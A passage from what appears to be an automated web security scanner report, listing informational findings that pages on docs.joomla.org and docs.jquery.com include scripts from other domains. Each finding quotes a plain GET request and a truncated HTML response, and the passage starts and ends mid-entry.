Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.165. http://docs.joomla.org/Web_designers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Web_designers

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Web_designers HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 16:34:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.166. http://docs.joomla.org/Working_Groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Working_Groups

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Working_Groups HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Fri, 14 Jan 2011 10:07:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.167. http://docs.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /index.php?title=Special:UserLogin&type=signup&returnto=Main_Page HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.168. http://docs.jquery.com/UI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:33:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 15:56:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.169. http://docs.jquery.com/UI/Dialog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Dialog

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Dialog HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:52 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Fri, 10 Dec 2010 17:56:02 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.170. http://docs.jquery.com/UI/Draggables

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Draggables

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Draggables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:13 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.171. http://docs.jquery.com/UI/Droppables

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Droppables

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Droppables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:21 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.172. http://docs.jquery.com/UI/Effects/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:00 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.173. http://docs.jquery.com/UI/Effects/Blind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Blind

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Blind HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:00 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.174. http://docs.jquery.com/UI/Effects/Bounce

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Bounce

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Bounce HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.175. http://docs.jquery.com/UI/Effects/Clip

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Clip

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Clip HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.176. http://docs.jquery.com/UI/Effects/Drop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Drop

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Drop HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.177. http://docs.jquery.com/UI/Effects/Explode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Explode

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Explode HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.178. http://docs.jquery.com/UI/Effects/Fold

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Fold

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Fold HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:06 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.179. http://docs.jquery.com/UI/Effects/Highlight

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Highlight

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Highlight HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:07 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Sun, 29 Aug 2010 18:46:15 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.180. http://docs.jquery.com/UI/Effects/Pulsate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Pulsate

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Pulsate HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.181. http://docs.jquery.com/UI/Effects/Scale

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Scale

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Scale HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.182. http://docs.jquery.com/UI/Effects/Shake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Shake

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Shake HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:08 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Fri, 19 Nov 2010 17:52:24 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.183. http://docs.jquery.com/UI/Effects/Slide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.184. http://docs.jquery.com/UI/Effects/Transfer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Transfer

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Transfer HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:12 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.185. http://docs.jquery.com/UI/Resizables

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Resizables

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Resizables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:33:01 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.186. http://docs.jquery.com/UI/Selectables

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Selectables

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Selectables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
